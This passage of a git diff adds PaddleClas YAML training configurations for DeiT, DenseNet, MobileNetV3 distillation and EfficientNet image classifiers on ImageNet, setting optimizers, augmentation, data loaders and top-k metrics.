image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_patch16_224.yaml new file mode 100644 index 0000000..f53b8ec --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_small_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_small_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_distilled_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_distilled_patch16_224.yaml new file mode 100644 index 0000000..8b9e00f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_distilled_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_tiny_distilled_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_patch16_224.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_patch16_224.yaml new file mode 100644 index 0000000..242093d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DeiT/DeiT_tiny_patch16_224.yaml @@ -0,0 +1,154 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DeiT_tiny_patch16_224 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token pos_embed dist_token + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 1e-3 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet121.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet121.yaml new file mode 100644 index 0000000..5100658 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet121.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet121 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet161.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet161.yaml new file mode 100644 index 0000000..2834903 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet161.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet161 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet169.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet169.yaml new file mode 100644 index 0000000..09fde34 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet169.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet169 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet201.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet201.yaml new file mode 100644 index 0000000..df2545c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet201.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet201 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet264.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet264.yaml new file mode 100644 index 0000000..bee9a26 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/DenseNet/DenseNet264.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: DenseNet264 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Distillation/mv3_large_x1_0_distill_mv3_small_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Distillation/mv3_large_x1_0_distill_mv3_small_x1_0.yaml new file mode 100644 index 0000000..3a96e58 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Distillation/mv3_large_x1_0_distill_mv3_small_x1_0.yaml @@ -0,0 +1,153 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: "./output/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + +# model architecture +Arch: + name: "DistillationModel" + class_num: 1000 + # if not null, its lengths should be same as models + pretrained_list: + # if not null, its lengths should be same as models + freeze_params_list: + - True + - False + models: + - Teacher: + name: MobileNetV3_large_x1_0 + pretrained: True + use_ssld: True + - Student: + name: MobileNetV3_small_x1_0 + pretrained: False + + infer_model_name: "Student" + + +# loss function config for traing/eval process +Loss: + Train: + - DistillationCELoss: + weight: 1.0 + model_name_pairs: + - ["Student", "Teacher"] + Eval: + - DistillationGTCELoss: + weight: 1.0 + model_names: ["Student"] + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: "./dataset/ILSVRC2012/" + cls_label_path: "./dataset/ILSVRC2012/train_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: "./dataset/ILSVRC2012/" + cls_label_path: "./dataset/ILSVRC2012/val_list.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Infer: + infer_imgs: "docs/images/whl/demo.jpg" + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: DistillationPostProcess + func: Topk + topk: 5 + class_id_map_file: "ppcls/utils/imagenet1k_label_list.txt" + +Metric: + Train: + - DistillationTopkAcc: + model_key: "Student" + topk: [1, 5] + Eval: + - DistillationTopkAcc: + model_key: "Student" + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB0.yaml new file mode 100644 index 0000000..2748e2f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/EfficientNet/EfficientNetB0.yaml @@ -0,0 +1,133 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: EfficientNetB0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: RMSProp + momentum: 0.9 + rho: 0.9 + epsilon: 0.001 + lr: + name: Cosine + learning_rate: 0.032 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 